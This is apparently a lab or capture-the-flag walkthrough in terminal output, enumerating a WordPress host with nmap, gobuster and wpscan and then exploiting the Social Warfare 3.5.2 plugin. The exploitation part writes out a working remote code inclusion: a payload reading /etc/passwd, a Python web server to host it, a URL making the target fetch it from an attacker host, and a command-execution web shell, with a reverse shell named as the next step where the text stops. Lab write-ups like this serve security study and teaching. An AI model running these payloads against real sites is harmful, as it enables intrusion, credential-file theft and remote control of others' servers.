┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -sV 192.168.161.123 -p 22,80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp filtered http
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.161.123 -w /usr/share/wordlists/dirb/common.txt -q -t 300
/index.html (Status: 200) [Size: 23]
/robots.txt (Status: 200) [Size: 57]
/server-status (Status: 403) [Size: 280]
/wordpress (Status: 301) [Size: 322] [--> <http://192.168.161.123/wordpress/>]
On /robots.txt is trolling
Since it has /wordpress why not do a WPScan?
┌──(kali㉿VirtualBox)-[~]
└─$ wpscan --url 192.168.161.123/wordpress/
[+] URL: <http://192.168.161.123/wordpress/> [192.168.161.123]
[+] Started: Mon Jun 27 10:56:12 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://192.168.161.123/wordpress/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://192.168.161.123/wordpress/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://192.168.161.123/wordpress/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://192.168.161.123/wordpress/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
| Found By: Rss Generator (Passive Detection)
| - <http://192.168.161.123/wordpress/index.php/feed/>, <generator><https://wordpress.org/?v=5.5></generator>
| - <http://192.168.161.123/wordpress/index.php/comments/feed/>, <generator><https://wordpress.org/?v=5.5></generator>
[+] WordPress theme in use: twentytwenty
| Location: <http://192.168.161.123/wordpress/wp-content/themes/twentytwenty/>
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: <http://192.168.161.123/wordpress/wp-content/themes/twentytwenty/readme.txt>
| [!] The version is out of date, the latest version is 2.0
| Style URL: <http://192.168.161.123/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5>
| Style Name: Twenty Twenty
| Style URI: <https://wordpress.org/themes/twentytwenty/>
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://192.168.161.123/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5>, Match: 'Version: 1.5'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] social-warfare
| Location: <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/>
| Last Updated: 2021-07-20T16:09:00.000Z
| [!] The version is out of date, the latest version is 4.3.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.2 (100% confidence)
| Found By: Comment (Passive Detection)
| - <http://192.168.161.123/wordpress/>, Match: 'Social Warfare v3.5.2'
| Confirmed By:
| Query Parameter (Passive Detection)
| - <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.2>
| - <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.2>
| Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/readme.txt>
| Readme - ChangeLog Section (Aggressive Detection)
| - <http://192.168.161.123/wordpress/wp-content/plugins/social-warfare/readme.txt>
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:01:25 <===================================================================================================> (137 / 137) 100.00% Time: 00:01:2501:42
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>
[+] Finished: Mon Jun 27 10:59:18 2022
[+] Requests Done: 188
[+] Cached Requests: 5
[+] Data Sent: 48.881 KB
[+] Data Received: 18.767 MB
[+] Memory used: 237.949 MB
[+] Elapsed time: 00:03:05
Note that we can see there is social-warfare is out of date and the current version is 3.5.2
https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618
1. Create payload file and host it on a location accessible by a targeted website. Payload content : "<pre>system('cat /etc/passwd')</pre>"
2. Visit <http://WEBSITE/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER_HOST/payload.txt>
3. Content of /etc/passwd will be returned
First craft a payload.txt with following content
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ cat payload.txt
<pre>system('cat /etc/passwd')</pre>
Then with our webserver open at port 80 very important must be port 80
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ sudo python3 -m http.server 80
Then visit the webpage and we will get the content of /etc/passwd
<http://TARGET/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER/payload.txt>
Now confirm it is vulnerable to this PoC, knowing that wordpress is actually coded with php, so we can get our cmd first then we can do a reverse shell on there
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ cat shell.txt
<pre>system($_GET[cmd])</pre>